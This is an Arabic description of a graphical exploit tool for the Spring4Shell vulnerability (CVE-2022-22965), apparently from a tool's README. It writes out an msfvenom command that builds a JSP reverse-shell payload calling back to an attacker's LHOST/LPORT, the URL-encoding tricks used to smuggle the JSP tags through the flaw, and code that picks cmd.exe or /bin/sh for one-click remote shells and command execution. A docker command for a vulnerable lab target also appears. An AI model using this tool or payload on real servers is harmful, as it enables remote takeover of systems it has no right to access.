
أداة كشف رسومية لثغرة CVE-2022-22965 (Spring4Shell) مع توليد قشرة عكسية بنقرة واحدة، وتنفيذ الأوامر، وتكييف مسار القشرة لخوادم متعددة.
الجهاز المستهدف
docker run -itd -p 80:8080 vulfocus/spring-core-rce-2022-03-29:latest
جوهر الـ reverse shell هو بالرجوع إلى msfvenom
msfvenom -p java/jsp_shell_reverse_tcp LHOST=xxx LPORT=xxx -f raw -o shell.jsp
بعد ترميز JSP بعنوان URL، استخدم %3C%25 استبدل %25%7Bc2%7Di يمثل <% %25%3E استبدل %25%7Bsuffix%7Di يمثل %> في الكود، تم إجراء تعديل وتقييم لـ shellpath بناءً على أنواع الخوادم المختلفة
if self.radioButton_win.isChecked():
shellpath = "cmd.exe"
if self.radioButton_linux.isChecked():
shellpath = "/bin/sh"
تنفيذ الأوامر:
استكشاف whoami:
reverse shell بنقرة واحدة
